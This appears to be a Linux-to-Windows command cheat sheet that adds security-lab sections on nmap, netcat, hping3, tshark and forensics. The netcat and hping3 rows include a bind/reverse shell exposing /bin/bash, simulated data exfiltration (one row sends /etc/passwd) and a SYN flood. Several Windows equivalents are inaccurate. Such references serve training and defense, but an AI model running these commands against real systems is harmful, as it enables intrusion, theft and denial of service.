The document provides a comprehensive comparison of Linux and Windows commands across various categories such as file management, system information, network management, and user management. Each command is listed alongside its counterpart in the other operating system, along with a brief description of its function. This serves as a quick reference guide for users transitioning between Linux and Windows environments.
| Function | Linux Command | Windows Command | Description |
|---|---|---|---|
| Listing Files | `ls` | `dir` | Lists files in a directory |
| | `ls -a` | `dir /a` | Lists all files, including hidden files |
| | `ls -l` | `dir /q` | Lists files in long format, showing permissions, owner, size |
| | `ls -R` | `tree` | Lists directory contents recursively |
| Copying Files | `cp source dest` | `copy source dest` | Copies a file from source to destination |
| | `cp -r source_directory/ dest/` | `xcopy source_directory dest /E` | Recursively copies all files and directories |
| Moving & Renaming | `mv oldname newname` | `ren oldname newname` | Renames or moves a file |
| | `mv file.txt /path/to/directory/` | `move file.txt destination` | Moves file to a specified directory |
| Deleting Files | `rm file.txt` | `del file.txt` | Deletes a file |
| | `rm -r directory` | `rmdir /s directory` | Recursively deletes a directory and its contents |
| Creating Files | `touch filename` | `echo.> filename` | Creates an empty file |
| Viewing File Contents | `cat file.txt` | `type file.txt` | Displays contents of a file |
| | `head -n 5 file.txt` | `more file.txt` | Displays the first 5 lines of a file |
| | `tail -n 5 file.txt` | `type file.txt` | Displays the last 5 lines of a file |
| Directory Navigation | `cd /path/to/directory` | `cd \path\to\directory` | Changes directory |
| | `pwd` | `cd` (no arguments) | Displays the current directory |
| | `tree` | `tree` | Shows directory structure in tree format |
| File Permissions | `chmod 755 filename` | `icacls filename /grant user:F` | Sets file permissions |
| | `chmod 770 ~/projects ~/resources` | `icacls folder /grant user:F` | Sets read, write, execute permissions for owner/group |
| | `chown user:group file.txt` | `takeown /f filename` | Changes ownership of a file |
| Disk Usage | `df -h` | `wmic logicaldisk get size,freespace` | Shows disk usage |
| | `du -sh /path/to/directory` | `chkdsk` | Shows size of a specific directory |
| System Information | `uname -a` | `systeminfo` | Displays system information |
| | `uptime` | `systeminfo` | Shows system uptime |
| | `free -h` | `systeminfo` | Shows memory usage |
| | `lscpu` | `wmic cpu get name` | Displays CPU information |
| | `lsusb` | `devmgmt.msc` | Displays USB device information |
| | `lspci` | `devmgmt.msc` | Displays PCI device information |
| Network Management | `ifconfig` | `ipconfig` | Shows network interfaces and configurations |
| | `ping address` | `ping address` | Tests network connectivity |
| | `netstat -tulnp` | `netstat -an` | Shows network connections |
| | `traceroute address` | `tracert address` | Traces the route packets take to a network |
| | `nslookup domain` | `nslookup domain` | Queries DNS for domain name or IP |
| Process Management | `ps aux` | `tasklist` | Lists running processes |
| | `kill PID` | `taskkill /PID` | Terminates a process by PID |
| | `top` | `taskmgr` | Displays real-time processes and resource usage |
| | `nice -n 10 command` | `start /low command` | Starts a command with specified priority |
| User Management | `useradd username` | `net user username /add` | Adds a new user |
| | `passwd username` | `net user username *` | Sets or changes a user's password |
| | `passwd -l root` | `net user Administrator /active:no` | Locks a user account |
| | `passwd -u root` | `net user Administrator /active:yes` | Unlocks a user account |
| | `userdel username` | `net user username /delete` | Deletes a user |
| | `whoami` | `whoami` | Shows the current user |
| | `groups username` | `net localgroup` | Displays groups a user belongs to |
| | `sudo visudo -f /etc/sudoers` | - | Edits the sudoers file for permissions |
| | `sudo usermod -aG group username` | `net localgroup group username /add` | Adds a user to a group |
| Environment Variables | `export VAR=value` | `set VAR=value` | Sets environment variables |
| | `printenv VAR` | `echo %VAR%` | Displays an environment variable |
| Text Processing | `grep "pattern" file.txt` | `findstr "pattern" file.txt` | Searches for a pattern in a file |
| | `awk '{print $1}' file.txt` | - | Text processing and manipulation |
| | `sed 's/old/new/g' file.txt` | `sed` | Replaces text in a file |
| | `sort file.txt` | `sort` | Sorts lines in a file |
| | `uniq file.txt` | `uniq` | Removes duplicate lines |
| | `wc -l file.txt` | `find /c` | Counts lines, words, and characters in a file |
| Archiving & Compression | `tar -cvf archive.tar files` | `tar` | Archives files into a .tar file |
| | `gzip file` | `gzip file` | Compresses a file using gzip |
| | `zip archive.zip file` | `zip archive.zip file` | Creates a .zip archive |
| | `unzip archive.zip` | `unzip archive.zip` | Extracts a .zip archive |
| Scheduling Tasks | `cron` / `crontab -e` | `schtasks` | Schedules tasks |
| | `at 15:00 /path/to/script.sh` | `at 15:00 task` | Executes a task at a specified time |
| Forensics | `dd if=/dev/sdX of=image.dd` | `diskcopy` | Copies data at the block level |
| | `strings file` | Sysinternals `strings` | Extracts readable text from binary files |
| | `sha256sum file` | `certutil -hashfile file SHA256` | Checks file integrity using SHA-256 |
| | `mount /dev/sdX /mnt` | `diskpart` | Mounts or unmounts file systems |
| | `lsof` | `handle` (Sysinternals) | Lists open files |
| Shutdown & Reboot | `shutdown -h now` | `shutdown /s` | Shuts down the system |
| | `reboot` | `shutdown /r` | Reboots the system |
| | `poweroff` | `shutdown /s` | Powers off the system |
| Help & Documentation | `man command` | `command /?` | Displays manual for a command |
| | `info command` | - | Displays detailed information about a command |
| Additional commands | `su - username` | | Switch to another user |
| | `sudo ls /root` | | Execute ls as root |
| | `sudo groupadd project` | | Create a group project |
| | `sudo usermod -aG project student` | | Add user to group project |
| | `grep -i "unauthorized" /var/log/auth.log` | | Search logs for unauthorized access |
| Nmap Commands | `sudo nmap -sn 192.168.1.0/24` | | Discovers active hosts |
| | `sudo nmap -sS -p 1-1000 [IP_address]` | | SYN scan of ports 1-1000 |
| | `sudo nmap -sV -sS -p 80,443,22 [IP_address]` | | Detects service versions |
| | `sudo nmap -O [IP_address]` | | OS detection |
| | `sudo nmap --script vuln [IP_address]` | | Scans for common vulnerabilities |
| Netcat (nc) Commands | `nc -v [IP_address] [port]` | | Retrieves server banners |
| | `nc -zv [IP_address] 20-80` | | Scans ports |
| | `nc -lp 55555 > sensitive_data.txt` | | Sets up a listener for file transfer |
| | `nc [Server_IP] 55555 < extracted_data.txt` | | Simulates data exfiltration |
| | `nc -lp 4444 -e /bin/bash` | | Reverse shell listener |
| | `nc [Target_IP] 4444` | | Connects to reverse shell |
| hping3 Commands | `sudo hping3 -S --flood -p 80 [IP_address]` | | SYN flood test |
| | `sudo hping3 -A -p 80 [IP_address]` | | ACK scan (firewall testing) |
| | `sudo hping3 -2 -p 53 [IP_address]` | | UDP port scan |
| | `sudo hping3 -1 [IP_address]` | | ICMP scan for blocked pings |
| | `sudo hping3 -c 1 [IP_address] -d 100 -E /etc/passwd` | | Simulates data exfiltration |
| Wireshark Commands | `ip.addr == [Target_IP] && (tcp` | | |
| | `tcp.flags.ack==1 && tcp.flags.rst==1` | | Tracks connection resets and anomalies in TCP responses |
| | `sudo tshark -i eth0 -f "arp"` | | Captures ARP traffic to detect ARP spoofing (MITM attack). |
| | `sudo tshark -i eth0 -f "udp port 53"` | | Monitors DNS traffic for malicious redirects. |
| | `sudo tshark -i eth0 -f "tcp port 80"` | | Captures and analyzes HTTP traffic for suspicious patterns like data exfiltration. |
| | `sudo tshark -i eth0 -f "tcp port 21"` | | Monitors FTP traffic for potential data exfiltration. |
| | `sudo tshark -i eth0 -Y "tcp.flags.syn == 1 && tcp.flags.ack == 0"` | | Captures TCP SYN packets to detect potential SYN flood DoS attacks. |
| | `sudo tshark -i eth0 -f "tcp port 80" -Y "http.request.method == POST"` | | Captures POST requests during a DoS attack to check for data exfiltration. |
| | `sudo netstat -anp` | `netstat -ano` | |
| | `sudo iptables -A INPUT -s <attacker_IP> -j DROP` | | Blocks IPs involved in DoS attacks. |
| SQLite | `sqlite3 /path/to/history.db "SELECT url, title FROM urls WHERE url LIKE '%query%';"` | | Extracts browsing history entries that match specific queries (e.g., phishing URLs). |
| | `sqlite3 /path/to/calllog.db "SELECT * FROM calls;"` | | Retrieves call logs from a SQLite database. |
| | `foremost -i /path/to/device -o /output_directory` | | Recovers deleted files from a storage device. |
| | `lsusb` | | Lists any external devices |